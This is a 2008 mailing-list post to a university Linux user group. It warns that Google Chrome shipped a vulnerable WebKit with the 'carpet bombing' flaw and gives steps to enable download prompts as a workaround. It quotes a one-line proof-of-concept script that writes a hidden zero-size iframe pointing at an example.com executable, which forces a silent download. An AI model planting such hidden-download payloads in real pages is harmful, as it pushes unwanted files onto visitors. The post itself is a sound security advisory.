LUG: Google Chrome browser 0-day exploit!

Jim Cuzella jcuzella at mines.edu
Fri Sep 5 11:31:44 MDT 2008


For those of you that may be experimenting with the new and exciting
google chrome browser: Beware!
As Kevin informed me last night, it uses a vulnerable version of webkit
(525.13), which contains the "carpet bombing" flaw found eariler in Safari.

For more information see here:
http://blogs.zdnet.com/security/?p43

The proof of concept is surprisingly simple:

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

While google is working on a workaround patch, the following steps may
be taken to prevent you from getting pwnt:

1. Click on the wrench in Chrome's upper right corner.

2. Click OPTIONS on the dropdown menu.

3. Check the box labeled "Ask where to save each file before downloading."

The vulnerability will still exist, however you will now be prompted for
every download.

Cheers,
- Jim C.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 195 bytes
Desc: OpenPGP digital signature
Url : https://mailman.mines.edu/mailman/private/lug/attachments/20080905/29719ea5/attachment.bin 


More information about the lug mailing list